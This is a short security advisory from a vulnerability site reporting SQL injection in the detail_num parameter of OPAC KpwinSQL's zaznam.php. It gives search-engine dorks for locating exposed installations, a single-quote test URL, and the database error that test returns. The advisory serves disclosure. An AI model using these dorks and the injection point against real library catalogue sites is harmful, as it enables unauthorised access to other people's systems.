OPAC KpwinSQL - SQL Injection

2016.06.25
Credit: bRpsd
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Product -> OPAC KpwinSQL - SQL Injection Date -> 6/24/2016 Author -> bRpsd Skype: vegnox Vendor HomePage -> http://www.kpsys.cz/ Product Download -> http://www.kpsys.cz/kpwinsql/demo.html Product Version -> / All SQL Version -> Firebird 1.5.3 OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista Dork -> intitle:"WWW OPAC KpwinSQL" Dork2 -> inurl:zaznam.php?detail_num= Dork3 -> inurl:opacsql2_0 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ File: zanzam.php Parameter: detail_num Test > http://localhost:8888/zaznam.php?detail_num=1' Response: 24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:wwwopacfunctions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se .


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top